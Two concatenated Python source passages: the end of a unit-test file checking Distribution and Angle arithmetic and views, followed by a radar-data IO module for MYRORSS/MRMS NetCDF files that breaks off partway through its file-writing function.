assert isinstance(ad_times_ad, Distribution)
ad += ad
assert isinstance(ad, Angle)
assert isinstance(ad, Distribution)
assert_array_equal(ad.distribution, ad_plus_ad.distribution)
with pytest.raises(u.UnitTypeError):
ad *= ad
def test_distr_angle_view_as_quantity():
# Check that Quantity subclasses decay to Quantity appropriately.
distr = Distribution([2., 3., 4.])
ad = Angle(distr, 'deg')
qd = ad.view(u.Quantity)
assert not isinstance(qd, Angle)
assert isinstance(qd, u.Quantity)
assert isinstance(qd, Distribution)
# View directly as DistributionQuantity class.
qd2 = ad.view(qd.__class__)
assert not isinstance(qd2, Angle)
assert isinstance(qd2, u.Quantity)
assert isinstance(qd2, Distribution)
assert_array_equal(qd2.distribution, qd.distribution)
qd3 = ad.view(qd.dtype, qd.__class__)
assert not isinstance(qd3, Angle)
assert isinstance(qd3, u.Quantity)
assert isinstance(qd3, Distribution)
assert_array_equal(qd3.distribution, qd.distribution)
def test_distr_cannot_view_new_dtype():
# A Distribution has a very specific structured dtype with just one
# element that holds the array of samples. As it is not clear what
# to do with a view as a new dtype, we just error on it.
# TODO: with a lot of thought, this restriction can likely be relaxed.
distr = Distribution([2., 3., 4.])
with pytest.raises(ValueError, match='with a new dtype'):
distr.view(np.dtype('f8'))
# Check subclass just in case.
ad = Angle(distr, 'deg')
with pytest.raises(ValueError, match='with a new dtype'):
ad.view(np.dtype('f8'))
with pytest.raises(ValueError, match='with a new dtype'):
ad.view(np.dtype('f8'), Distribution)
| |
"""IO methods for radar data from MYRORSS or MRMS.
MYRORSS = Multi-year Reanalysis of Remotely Sensed Storms
MRMS = Multi-radar Multi-sensor
"""
import os
import glob
import warnings
import numpy
import pandas
from netCDF4 import Dataset
from gewittergefahr.gg_io import netcdf_io
from gewittergefahr.gg_utils import number_rounding as rounder
from gewittergefahr.gg_utils import time_conversion
from gewittergefahr.gg_utils import time_periods
from gewittergefahr.gg_utils import longitude_conversion as lng_conversion
from gewittergefahr.gg_utils import grids
from gewittergefahr.gg_utils import radar_utils
from gewittergefahr.gg_utils import myrorss_and_mrms_utils
from gewittergefahr.gg_utils import file_system_utils
from gewittergefahr.gg_utils import error_checking
NW_GRID_POINT_LAT_COLUMN_ORIG = 'Latitude'
NW_GRID_POINT_LNG_COLUMN_ORIG = 'Longitude'
LAT_SPACING_COLUMN_ORIG = 'LatGridSpacing'
LNG_SPACING_COLUMN_ORIG = 'LonGridSpacing'
NUM_LAT_COLUMN_ORIG = 'Lat'
NUM_LNG_COLUMN_ORIG = 'Lon'
NUM_PIXELS_COLUMN_ORIG = 'pixel'
HEIGHT_COLUMN_ORIG = 'Height'
UNIX_TIME_COLUMN_ORIG = 'Time'
FIELD_NAME_COLUMN_ORIG = 'TypeName'
SENTINEL_VALUE_COLUMNS_ORIG = ['MissingData', 'RangeFolded']
GRID_ROW_COLUMN = 'grid_row'
GRID_COLUMN_COLUMN = 'grid_column'
NUM_GRID_CELL_COLUMN = 'num_grid_cells'
GRID_ROW_COLUMN_ORIG = 'pixel_x'
GRID_COLUMN_COLUMN_ORIG = 'pixel_y'
NUM_GRID_CELL_COLUMN_ORIG = 'pixel_count'
TIME_FORMAT_SECONDS = '%Y%m%d-%H%M%S'
TIME_FORMAT_MINUTES = '%Y%m%d-%H%M'
TIME_FORMAT_FOR_LOG_MESSAGES = '%Y-%m-%d-%H%M%S'
TIME_FORMAT_SECONDS_REGEX = (
'[0-9][0-9][0-9][0-9][0-1][0-9][0-3][0-9]-[0-2][0-9][0-5][0-9][0-5][0-9]')
MINUTES_TO_SECONDS = 60
METRES_TO_KM = 1e-3
SENTINEL_TOLERANCE = 10.
LATLNG_MULTIPLE_DEG = 1e-4
DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC = 240
DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC = 180
ZIPPED_FILE_EXTENSION = '.gz'
UNZIPPED_FILE_EXTENSION = '.netcdf'
AZIMUTHAL_SHEAR_FIELD_NAMES = [
radar_utils.LOW_LEVEL_SHEAR_NAME, radar_utils.MID_LEVEL_SHEAR_NAME]
RADAR_FILE_NAMES_KEY = 'radar_file_name_matrix'
UNIQUE_TIMES_KEY = 'unique_times_unix_sec'
SPC_DATES_AT_UNIQUE_TIMES_KEY = 'spc_dates_at_unique_times_unix_sec'
FIELD_NAME_BY_PAIR_KEY = 'field_name_by_pair'
HEIGHT_BY_PAIR_KEY = 'height_by_pair_m_asl'
def _get_pathless_raw_file_pattern(unix_time_sec):
"""Generates glob pattern for pathless name of raw file.
This method rounds the time step to the nearest minute and allows the file
to be either zipped or unzipped.
The pattern generated by this method is meant for input to `glob.glob`.
This method is the "pattern" version of _get_pathless_raw_file_name.
:param unix_time_sec: Valid time.
:return: pathless_raw_file_pattern: Pathless glob pattern for raw file.
"""
return '{0:s}*{1:s}*'.format(
time_conversion.unix_sec_to_string(unix_time_sec, TIME_FORMAT_MINUTES),
UNZIPPED_FILE_EXTENSION
)
def _get_pathless_raw_file_name(unix_time_sec, zipped=True):
"""Generates pathless name for raw file.
:param unix_time_sec: Valid time.
:param zipped: Boolean flag. If True, will generate name for zipped file.
If False, will generate name for unzipped file.
:return: pathless_raw_file_name: Pathless name for raw file.
"""
if zipped:
return '{0:s}{1:s}{2:s}'.format(
time_conversion.unix_sec_to_string(
unix_time_sec, TIME_FORMAT_SECONDS),
UNZIPPED_FILE_EXTENSION,
ZIPPED_FILE_EXTENSION
)
return '{0:s}{1:s}'.format(
time_conversion.unix_sec_to_string(unix_time_sec, TIME_FORMAT_SECONDS),
UNZIPPED_FILE_EXTENSION
)
def _remove_sentinels_from_sparse_grid(
sparse_grid_table, field_name, sentinel_values):
"""Removes sentinel values from sparse grid.
:param sparse_grid_table: pandas DataFrame with columns produced by
`read_data_from_sparse_grid_file`.
:param field_name: Name of radar field in GewitterGefahr format.
:param sentinel_values: 1-D numpy array of sentinel values.
:return: sparse_grid_table: Same as input, except that rows with a sentinel
value are removed.
"""
num_rows = len(sparse_grid_table.index)
sentinel_flags = numpy.full(num_rows, False, dtype=bool)
for this_sentinel_value in sentinel_values:
these_sentinel_flags = numpy.isclose(
sparse_grid_table[field_name].values, this_sentinel_value,
atol=SENTINEL_TOLERANCE)
sentinel_flags = numpy.logical_or(sentinel_flags, these_sentinel_flags)
sentinel_indices = numpy.where(sentinel_flags)[0]
return sparse_grid_table.drop(
sparse_grid_table.index[sentinel_indices], axis=0, inplace=False)
def _remove_sentinels_from_full_grid(field_matrix, sentinel_values):
"""Removes sentinel values from full grid.
M = number of rows (unique grid-point latitudes)
N = number of columns (unique grid-point longitudes)
:param field_matrix: M-by-N numpy array with radar field.
:param sentinel_values: 1-D numpy array of sentinel values.
:return: field_matrix: Same as input, except that sentinel values are
replaced with NaN.
"""
num_grid_rows = field_matrix.shape[0]
num_grid_columns = field_matrix.shape[1]
num_grid_points = num_grid_rows * num_grid_columns
field_matrix = numpy.reshape(field_matrix, num_grid_points)
sentinel_flags = numpy.full(num_grid_points, False, dtype=bool)
for this_sentinel_value in sentinel_values:
these_sentinel_flags = numpy.isclose(
field_matrix, this_sentinel_value, atol=SENTINEL_TOLERANCE)
sentinel_flags = numpy.logical_or(sentinel_flags, these_sentinel_flags)
sentinel_indices = numpy.where(sentinel_flags)[0]
field_matrix[sentinel_indices] = numpy.nan
return numpy.reshape(field_matrix, (num_grid_rows, num_grid_columns))
def get_relative_dir_for_raw_files(field_name, data_source, height_m_asl=None):
"""Generates relative path for raw files.
:param field_name: Name of radar field in GewitterGefahr format.
:param data_source: Data source (string).
:param height_m_asl: Radar height (metres above sea level).
:return: relative_directory_name: Relative path for raw files.
"""
if field_name == radar_utils.REFL_NAME:
radar_utils.check_heights(
data_source=data_source, heights_m_asl=numpy.array([height_m_asl]),
field_name=radar_utils.REFL_NAME)
else:
height_m_asl = radar_utils.get_valid_heights(
data_source=data_source, field_name=field_name)[0]
return '{0:s}/{1:05.2f}'.format(
radar_utils.field_name_new_to_orig(
field_name=field_name, data_source_name=data_source),
float(height_m_asl) * METRES_TO_KM
)
def find_raw_file(
unix_time_sec, spc_date_string, field_name, data_source,
top_directory_name, height_m_asl=None, raise_error_if_missing=True):
"""Finds raw file.
File should contain one field at one time step (e.g., MESH at 123502 UTC,
reflectivity at 500 m above sea level and 123502 UTC).
:param unix_time_sec: Valid time.
:param spc_date_string: SPC date (format "yyyymmdd").
:param field_name: Name of radar field in GewitterGefahr format.
:param data_source: Data source (string).
:param top_directory_name: Name of top-level directory with raw files.
:param height_m_asl: Radar height (metres above sea level).
:param raise_error_if_missing: Boolean flag. If True and file is missing,
this method will raise an error. If False and file is missing, will
return *expected* path to raw file.
:return: raw_file_name: Path to raw file.
:raises: ValueError: if raise_error_if_missing = True and file is missing.
"""
# Error-checking.
_ = time_conversion.spc_date_string_to_unix_sec(spc_date_string)
error_checking.assert_is_string(top_directory_name)
error_checking.assert_is_boolean(raise_error_if_missing)
relative_directory_name = get_relative_dir_for_raw_files(
field_name=field_name, height_m_asl=height_m_asl,
data_source=data_source)
directory_name = '{0:s}/{1:s}/{2:s}/{3:s}'.format(
top_directory_name, spc_date_string[:4], spc_date_string,
relative_directory_name
)
pathless_file_name = _get_pathless_raw_file_name(unix_time_sec, zipped=True)
raw_file_name = '{0:s}/{1:s}'.format(directory_name, pathless_file_name)
if raise_error_if_missing and not os.path.isfile(raw_file_name):
pathless_file_name = _get_pathless_raw_file_name(
unix_time_sec, zipped=False)
raw_file_name = '{0:s}/{1:s}'.format(directory_name, pathless_file_name)
if raise_error_if_missing and not os.path.isfile(raw_file_name):
raise ValueError(
'Cannot find raw file. Expected at: "{0:s}"'.format(raw_file_name)
)
return raw_file_name
def raw_file_name_to_time(raw_file_name):
"""Parses time from file name.
:param raw_file_name: Path to raw file.
:return: unix_time_sec: Valid time.
"""
error_checking.assert_is_string(raw_file_name)
_, time_string = os.path.split(raw_file_name)
time_string = time_string.replace(ZIPPED_FILE_EXTENSION, '').replace(
UNZIPPED_FILE_EXTENSION, '')
return time_conversion.string_to_unix_sec(time_string, TIME_FORMAT_SECONDS)
def find_raw_file_inexact_time(
desired_time_unix_sec, spc_date_string, field_name, data_source,
top_directory_name, height_m_asl=None, max_time_offset_sec=None,
raise_error_if_missing=False):
"""Finds raw file at inexact time.
If you know the exact valid time, use `find_raw_file`.
:param desired_time_unix_sec: Desired valid time.
:param spc_date_string: SPC date (format "yyyymmdd").
:param field_name: Field name in GewitterGefahr format.
:param data_source: Data source (string).
:param top_directory_name: Name of top-level directory with raw files.
:param height_m_asl: Radar height (metres above sea level).
:param max_time_offset_sec: Maximum offset between actual and desired valid
time.
For example, if `desired_time_unix_sec` is 162933 UTC 5 Jan 2018 and
`max_time_offset_sec` = 60, this method will look for az-shear at valid
times from 162833...163033 UTC 5 Jan 2018.
If None, this defaults to `DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC` for
azimuthal-shear fields and `DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC` for
all other fields.
:param raise_error_if_missing: Boolean flag. If no file is found and
raise_error_if_missing = True, this method will error out. If no file
is found and raise_error_if_missing = False, will return None.
:return: raw_file_name: Path to raw file.
:raises: ValueError: if no file is found and raise_error_if_missing = True.
"""
# Error-checking.
error_checking.assert_is_integer(desired_time_unix_sec)
_ = time_conversion.spc_date_string_to_unix_sec(spc_date_string)
error_checking.assert_is_boolean(raise_error_if_missing)
radar_utils.check_field_name(field_name)
if max_time_offset_sec is None:
if field_name in AZIMUTHAL_SHEAR_FIELD_NAMES:
max_time_offset_sec = DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC
else:
max_time_offset_sec = DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC
error_checking.assert_is_integer(max_time_offset_sec)
error_checking.assert_is_greater(max_time_offset_sec, 0)
first_allowed_minute_unix_sec = numpy.round(int(rounder.floor_to_nearest(
float(desired_time_unix_sec - max_time_offset_sec),
MINUTES_TO_SECONDS)))
last_allowed_minute_unix_sec = numpy.round(int(rounder.floor_to_nearest(
float(desired_time_unix_sec + max_time_offset_sec),
MINUTES_TO_SECONDS)))
allowed_minutes_unix_sec = time_periods.range_and_interval_to_list(
start_time_unix_sec=first_allowed_minute_unix_sec,
end_time_unix_sec=last_allowed_minute_unix_sec,
time_interval_sec=MINUTES_TO_SECONDS, include_endpoint=True).astype(int)
relative_directory_name = get_relative_dir_for_raw_files(
field_name=field_name, data_source=data_source,
height_m_asl=height_m_asl)
raw_file_names = []
for this_time_unix_sec in allowed_minutes_unix_sec:
this_pathless_file_pattern = _get_pathless_raw_file_pattern(
this_time_unix_sec)
this_file_pattern = '{0:s}/{1:s}/{2:s}/{3:s}/{4:s}'.format(
top_directory_name, spc_date_string[:4], spc_date_string,
relative_directory_name, this_pathless_file_pattern
)
raw_file_names += glob.glob(this_file_pattern)
file_times_unix_sec = []
for this_raw_file_name in raw_file_names:
file_times_unix_sec.append(raw_file_name_to_time(this_raw_file_name))
if len(file_times_unix_sec):
file_times_unix_sec = numpy.array(file_times_unix_sec)
time_differences_sec = numpy.absolute(
file_times_unix_sec - desired_time_unix_sec)
nearest_index = numpy.argmin(time_differences_sec)
min_time_diff_sec = time_differences_sec[nearest_index]
else:
min_time_diff_sec = numpy.inf
if min_time_diff_sec > max_time_offset_sec:
if raise_error_if_missing:
desired_time_string = time_conversion.unix_sec_to_string(
desired_time_unix_sec, TIME_FORMAT_FOR_LOG_MESSAGES)
error_string = (
'Could not find "{0:s}" file within {1:d} seconds of {2:s}.'
).format(field_name, max_time_offset_sec, desired_time_string)
raise ValueError(error_string)
return None
return raw_file_names[nearest_index]
def find_raw_files_one_spc_date(
spc_date_string, field_name, data_source, top_directory_name,
height_m_asl=None, raise_error_if_missing=True):
"""Finds raw files for one field and one SPC date.
:param spc_date_string: SPC date (format "yyyymmdd").
:param field_name: Name of radar field in GewitterGefahr format.
:param data_source: Data source (string).
:param top_directory_name: Name of top-level directory with raw files.
:param height_m_asl: Radar height (metres above sea level).
:param raise_error_if_missing: Boolean flag. If True and no files are
found, will raise error.
:return: raw_file_names: 1-D list of paths to raw files.
:raises: ValueError: if raise_error_if_missing = True and no files are
found.
"""
error_checking.assert_is_boolean(raise_error_if_missing)
example_time_unix_sec = time_conversion.spc_date_string_to_unix_sec(
spc_date_string)
example_file_name = find_raw_file(
unix_time_sec=example_time_unix_sec, spc_date_string=spc_date_string,
field_name=field_name, data_source=data_source,
top_directory_name=top_directory_name, height_m_asl=height_m_asl,
raise_error_if_missing=False)
example_directory_name, example_pathless_file_name = os.path.split(
example_file_name)
example_time_string = time_conversion.unix_sec_to_string(
example_time_unix_sec, TIME_FORMAT_SECONDS)
pathless_file_pattern = example_pathless_file_name.replace(
example_time_string, TIME_FORMAT_SECONDS_REGEX)
pathless_file_pattern = pathless_file_pattern.replace(
ZIPPED_FILE_EXTENSION, '*')
raw_file_pattern = '{0:s}/{1:s}'.format(
example_directory_name, pathless_file_pattern)
raw_file_names = glob.glob(raw_file_pattern)
if raise_error_if_missing and not raw_file_names:
error_string = (
'Could not find any files with the following pattern: {0:s}'
).format(raw_file_pattern)
raise ValueError(error_string)
return raw_file_names
def find_many_raw_files(
desired_times_unix_sec, spc_date_strings, data_source, field_names,
top_directory_name, reflectivity_heights_m_asl=None,
max_time_offset_for_az_shear_sec=
DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC,
max_time_offset_for_non_shear_sec=
DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC):
"""Finds raw file for each field/height pair and time step.
N = number of input times
T = number of unique input times
F = number of field/height pairs
:param desired_times_unix_sec: length-N numpy array with desired valid
times.
:param spc_date_strings: length-N list of corresponding SPC dates (format
"yyyymmdd").
:param data_source: Data source ("myrorss" or "mrms").
:param field_names: 1-D list of field names.
:param top_directory_name: Name of top-level directory with radar data from
the given source.
:param reflectivity_heights_m_asl: 1-D numpy array of heights (metres above
sea level) for the field "reflectivity_dbz". If "reflectivity_dbz" is
not in `field_names`, leave this as None.
:param max_time_offset_for_az_shear_sec: Max time offset (between desired
and actual valid time) for azimuthal-shear fields.
:param max_time_offset_for_non_shear_sec: Max time offset (between desired
and actual valid time) for non-azimuthal-shear fields.
:return: file_dictionary: Dictionary with the following keys.
file_dictionary['radar_file_name_matrix']: T-by-F numpy array of paths to
raw files.
file_dictionary['unique_times_unix_sec']: length-T numpy array of unique
valid times.
file_dictionary['spc_date_strings_for_unique_times']: length-T numpy array
of corresponding SPC dates.
file_dictionary['field_name_by_pair']: length-F list of field names.
file_dictionary['height_by_pair_m_asl']: length-F numpy array of heights
(metres above sea level).
"""
field_name_by_pair, height_by_pair_m_asl = (
myrorss_and_mrms_utils.fields_and_refl_heights_to_pairs(
field_names=field_names, data_source=data_source,
refl_heights_m_asl=reflectivity_heights_m_asl)
)
num_fields = len(field_name_by_pair)
error_checking.assert_is_integer_numpy_array(desired_times_unix_sec)
error_checking.assert_is_numpy_array(
desired_times_unix_sec, num_dimensions=1)
num_times = len(desired_times_unix_sec)
error_checking.assert_is_string_list(spc_date_strings)
error_checking.assert_is_numpy_array(
numpy.array(spc_date_strings),
exact_dimensions=numpy.array([num_times]))
spc_dates_unix_sec = numpy.array(
[time_conversion.spc_date_string_to_unix_sec(s)
for s in spc_date_strings])
time_matrix = numpy.hstack((
numpy.reshape(desired_times_unix_sec, (num_times, 1)),
numpy.reshape(spc_dates_unix_sec, (num_times, 1))
))
unique_time_matrix = numpy.vstack(
{tuple(this_row) for this_row in time_matrix}
).astype(int)
unique_times_unix_sec = unique_time_matrix[:, 0]
spc_dates_at_unique_times_unix_sec = unique_time_matrix[:, 1]
sort_indices = numpy.argsort(unique_times_unix_sec)
unique_times_unix_sec = unique_times_unix_sec[sort_indices]
spc_dates_at_unique_times_unix_sec = spc_dates_at_unique_times_unix_sec[
sort_indices]
num_unique_times = len(unique_times_unix_sec)
radar_file_name_matrix = numpy.full(
(num_unique_times, num_fields), '', dtype=object)
for i in range(num_unique_times):
this_spc_date_string = time_conversion.time_to_spc_date_string(
spc_dates_at_unique_times_unix_sec[i])
for j in range(num_fields):
if field_name_by_pair[j] in AZIMUTHAL_SHEAR_FIELD_NAMES:
this_max_time_offset_sec = max_time_offset_for_az_shear_sec
this_raise_error_flag = False
else:
this_max_time_offset_sec = max_time_offset_for_non_shear_sec
this_raise_error_flag = True
if this_max_time_offset_sec == 0:
radar_file_name_matrix[i, j] = find_raw_file(
unix_time_sec=unique_times_unix_sec[i],
spc_date_string=this_spc_date_string,
field_name=field_name_by_pair[j], data_source=data_source,
top_directory_name=top_directory_name,
height_m_asl=height_by_pair_m_asl[j],
raise_error_if_missing=this_raise_error_flag)
else:
radar_file_name_matrix[i, j] = find_raw_file_inexact_time(
desired_time_unix_sec=unique_times_unix_sec[i],
spc_date_string=this_spc_date_string,
field_name=field_name_by_pair[j], data_source=data_source,
top_directory_name=top_directory_name,
height_m_asl=height_by_pair_m_asl[j],
max_time_offset_sec=this_max_time_offset_sec,
raise_error_if_missing=this_raise_error_flag)
if radar_file_name_matrix[i, j] is None:
this_time_string = time_conversion.unix_sec_to_string(
unique_times_unix_sec[i], TIME_FORMAT_FOR_LOG_MESSAGES)
warning_string = (
'Cannot find file for "{0:s}" at {1:d} metres ASL and '
'{2:s}.'
).format(
field_name_by_pair[j], int(height_by_pair_m_asl[j]),
this_time_string
)
warnings.warn(warning_string)
return {
RADAR_FILE_NAMES_KEY: radar_file_name_matrix,
UNIQUE_TIMES_KEY: unique_times_unix_sec,
SPC_DATES_AT_UNIQUE_TIMES_KEY: spc_dates_at_unique_times_unix_sec,
FIELD_NAME_BY_PAIR_KEY: field_name_by_pair,
HEIGHT_BY_PAIR_KEY: numpy.round(height_by_pair_m_asl).astype(int)
}
def read_metadata_from_raw_file(
netcdf_file_name, data_source, raise_error_if_fails=True):
"""Reads metadata from raw (either MYRORSS or MRMS) file.
This file should contain one radar field at one height and valid time.
:param netcdf_file_name: Path to input file.
:param data_source: Data source (string).
:param raise_error_if_fails: Boolean flag. If True and file cannot be read,
this method will raise an error. If False and file cannot be read, will
return None.
:return: metadata_dict: Dictionary with the following keys.
metadata_dict['nw_grid_point_lat_deg']: Latitude (deg N) of northwesternmost
grid point.
metadata_dict['nw_grid_point_lng_deg']: Longitude (deg E) of
northwesternmost grid point.
metadata_dict['lat_spacing_deg']: Spacing (deg N) between meridionally
adjacent grid points.
metadata_dict['lng_spacing_deg']: Spacing (deg E) between zonally adjacent
grid points.
metadata_dict['num_lat_in_grid']: Number of rows (unique grid-point
latitudes).
metadata_dict['num_lng_in_grid']: Number of columns (unique grid-point
longitudes).
metadata_dict['height_m_asl']: Radar height (metres above ground level).
metadata_dict['unix_time_sec']: Valid time.
metadata_dict['field_name']: Name of radar field in GewitterGefahr format.
metadata_dict['field_name_orig']: Name of radar field in original (either
MYRORSS or MRMS) format.
metadata_dict['sentinel_values']: 1-D numpy array of sentinel values.
"""
error_checking.assert_file_exists(netcdf_file_name)
netcdf_dataset = netcdf_io.open_netcdf(
netcdf_file_name, raise_error_if_fails)
if netcdf_dataset is None:
return None
field_name_orig = str(getattr(netcdf_dataset, FIELD_NAME_COLUMN_ORIG))
metadata_dict = {
radar_utils.NW_GRID_POINT_LAT_COLUMN:
getattr(netcdf_dataset, NW_GRID_POINT_LAT_COLUMN_ORIG),
radar_utils.NW_GRID_POINT_LNG_COLUMN:
lng_conversion.convert_lng_positive_in_west(
getattr(netcdf_dataset, NW_GRID_POINT_LNG_COLUMN_ORIG),
allow_nan=False),
radar_utils.LAT_SPACING_COLUMN:
getattr(netcdf_dataset, LAT_SPACING_COLUMN_ORIG),
radar_utils.LNG_SPACING_COLUMN:
getattr(netcdf_dataset, LNG_SPACING_COLUMN_ORIG),
radar_utils.NUM_LAT_COLUMN:
netcdf_dataset.dimensions[NUM_LAT_COLUMN_ORIG].size + 1,
radar_utils.NUM_LNG_COLUMN:
netcdf_dataset.dimensions[NUM_LNG_COLUMN_ORIG].size + 1,
radar_utils.HEIGHT_COLUMN:
getattr(netcdf_dataset, HEIGHT_COLUMN_ORIG),
radar_utils.UNIX_TIME_COLUMN:
getattr(netcdf_dataset, UNIX_TIME_COLUMN_ORIG),
FIELD_NAME_COLUMN_ORIG: field_name_orig,
radar_utils.FIELD_NAME_COLUMN: radar_utils.field_name_orig_to_new(
field_name_orig=field_name_orig, data_source_name=data_source)
}
latitude_spacing_deg = metadata_dict[radar_utils.LAT_SPACING_COLUMN]
longitude_spacing_deg = metadata_dict[radar_utils.LNG_SPACING_COLUMN]
# TODO(thunderhoser): The following "if" condition is a hack. The purpose
# is to change grid corners only for actual MYRORSS data, not GridRad data
# in MYRORSS format.
if latitude_spacing_deg < 0.011 and longitude_spacing_deg < 0.011:
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] = (
rounder.floor_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
metadata_dict[radar_utils.LAT_SPACING_COLUMN]))
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN] = (
rounder.ceiling_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
metadata_dict[radar_utils.LNG_SPACING_COLUMN]))
sentinel_values = []
for this_column in SENTINEL_VALUE_COLUMNS_ORIG:
sentinel_values.append(getattr(netcdf_dataset, this_column))
metadata_dict.update({
radar_utils.SENTINEL_VALUE_COLUMN: numpy.array(sentinel_values)})
netcdf_dataset.close()
return metadata_dict
def read_data_from_sparse_grid_file(
netcdf_file_name, field_name_orig, data_source, sentinel_values,
raise_error_if_fails=True):
"""Reads sparse radar grid from raw (either MYRORSS or MRMS) file.
This file should contain one radar field at one height and valid time.
:param netcdf_file_name: Path to input file.
:param field_name_orig: Name of radar field in original (either MYRORSS or
MRMS) format.
:param data_source: Data source (string).
:param sentinel_values: 1-D numpy array of sentinel values.
:param raise_error_if_fails: Boolean flag. If True and file cannot be read,
this method will raise an error. If False and file cannot be read, will
return None.
:return: sparse_grid_table: pandas DataFrame with the following columns.
Each row corresponds to one grid point.
sparse_grid_table.grid_row: Row index.
sparse_grid_table.grid_column: Column index.
sparse_grid_table.<field_name>: Radar measurement (column name is produced
by _field_name_orig_to_new).
sparse_grid_table.num_grid_cells: Number of consecutive grid points with the
same radar measurement. Counting is row-major (to the right along the
row, then down to the next column if necessary).
"""
error_checking.assert_file_exists(netcdf_file_name)
error_checking.assert_is_numpy_array_without_nan(sentinel_values)
error_checking.assert_is_numpy_array(sentinel_values, num_dimensions=1)
netcdf_dataset = netcdf_io.open_netcdf(
netcdf_file_name, raise_error_if_fails)
if netcdf_dataset is None:
return None
field_name = radar_utils.field_name_orig_to_new(
field_name_orig=field_name_orig, data_source_name=data_source)
num_values = len(netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG])
if num_values == 0:
sparse_grid_dict = {
GRID_ROW_COLUMN: numpy.array([], dtype=int),
GRID_COLUMN_COLUMN: numpy.array([], dtype=int),
NUM_GRID_CELL_COLUMN: numpy.array([], dtype=int),
field_name: numpy.array([])}
else:
sparse_grid_dict = {
GRID_ROW_COLUMN: netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG][:],
GRID_COLUMN_COLUMN:
netcdf_dataset.variables[GRID_COLUMN_COLUMN_ORIG][:],
NUM_GRID_CELL_COLUMN:
netcdf_dataset.variables[NUM_GRID_CELL_COLUMN_ORIG][:],
field_name: netcdf_dataset.variables[field_name_orig][:]}
netcdf_dataset.close()
sparse_grid_table = pandas.DataFrame.from_dict(sparse_grid_dict)
return _remove_sentinels_from_sparse_grid(
sparse_grid_table, field_name=field_name,
sentinel_values=sentinel_values)
def read_data_from_full_grid_file(
netcdf_file_name, metadata_dict, raise_error_if_fails=True):
"""Reads full radar grid from raw (either MYRORSS or MRMS) file.
This file should contain one radar field at one height and valid time.
:param netcdf_file_name: Path to input file.
:param metadata_dict: Dictionary created by `read_metadata_from_raw_file`.
:param raise_error_if_fails: Boolean flag. If True and file cannot be read,
this method will raise an error. If False and file cannot be read, will
return None for all output vars.
:return: field_matrix: M-by-N numpy array with radar field. Latitude
increases while moving up each column, and longitude increases while
moving right along each row.
:return: grid_point_latitudes_deg: length-M numpy array of grid-point
latitudes (deg N). This array is monotonically decreasing.
:return: grid_point_longitudes_deg: length-N numpy array of grid-point
longitudes (deg E). This array is monotonically increasing.
"""
error_checking.assert_file_exists(netcdf_file_name)
netcdf_dataset = netcdf_io.open_netcdf(
netcdf_file_name, raise_error_if_fails)
if netcdf_dataset is None:
return None, None, None
field_matrix = netcdf_dataset.variables[
metadata_dict[FIELD_NAME_COLUMN_ORIG]]
netcdf_dataset.close()
min_latitude_deg = metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] - (
metadata_dict[radar_utils.LAT_SPACING_COLUMN] * (
metadata_dict[radar_utils.NUM_LAT_COLUMN] - 1))
grid_point_latitudes_deg, grid_point_longitudes_deg = (
grids.get_latlng_grid_points(
min_latitude_deg=min_latitude_deg,
min_longitude_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN],
num_rows=metadata_dict[radar_utils.NUM_LAT_COLUMN],
num_columns=metadata_dict[radar_utils.NUM_LNG_COLUMN]))
field_matrix = _remove_sentinels_from_full_grid(
field_matrix, metadata_dict[radar_utils.SENTINEL_VALUE_COLUMN])
return (numpy.flipud(field_matrix), grid_point_latitudes_deg[::-1],
grid_point_longitudes_deg)
def write_field_to_myrorss_file(
field_matrix, netcdf_file_name, field_name, metadata_dict,
height_m_asl=None):
"""Writes field to MYRORSS-formatted file.
M = number of rows (unique grid-point latitudes)
N = number of columns (unique grid-point longitudes)
:param field_matrix: M-by-N numpy array with one radar variable at one time.
Latitude should increase down each column, and longitude should increase
to the right along each row.
:param netcdf_file_name: Path to output file.
:param field_name: Name of radar field in GewitterGefahr format.
:param metadata_dict: Dictionary created by either
`gridrad_io.read_metadata_from_full_grid_file` or
`read_metadata_from_raw_file`.
:param height_m_asl: Height of radar field (metres above sea level).
"""
if field_name == radar_utils.REFL_NAME:
field_to_heights_dict_m_asl = (
myrorss_and_mrms_utils.fields_and_refl_heights_to_dict(
field_names=[field_name],
data_source=radar_utils.MYRORSS_SOURCE_ID,
refl_heights_m_asl=numpy.array([height_m_asl])))
else:
field_to_heights_dict_m_asl = (
myrorss_and_mrms_utils.fields_and_refl_heights_to_dict(
field_names=[field_name],
data_source=radar_utils.MYRORSS_SOURCE_ID))
field_name = list(field_to_heights_dict_m_asl.keys())[0]
radar_height_m_asl = field_to_heights_dict_m_asl[field_name][0]
if field_name in radar_utils.ECHO_TOP_NAMES:
field_matrix = METRES_TO_KM * field_matrix
field_name_myrorss = radar_utils.field_name_new_to_orig(
field_name=field_name, data_source_name=radar_utils.MYRORSS_SOURCE_ID)
file_system_utils.mkdir_recursive_if_necessary(file_name=netcdf_file_name)
netcdf_dataset = Dataset(
netcdf_file_name, 'w', format='NETCDF3_64BIT_OFFSET')
netcdf_dataset.setncattr(
FIELD_NAME_COLUMN_ORIG, field_name_myrorss)
netcdf_dataset.setncattr('DataType', 'SparseLatLonGrid')
netcdf_dataset.setncattr(
NW_GRID_POINT_LAT_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
NW_GRID_POINT_LNG_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
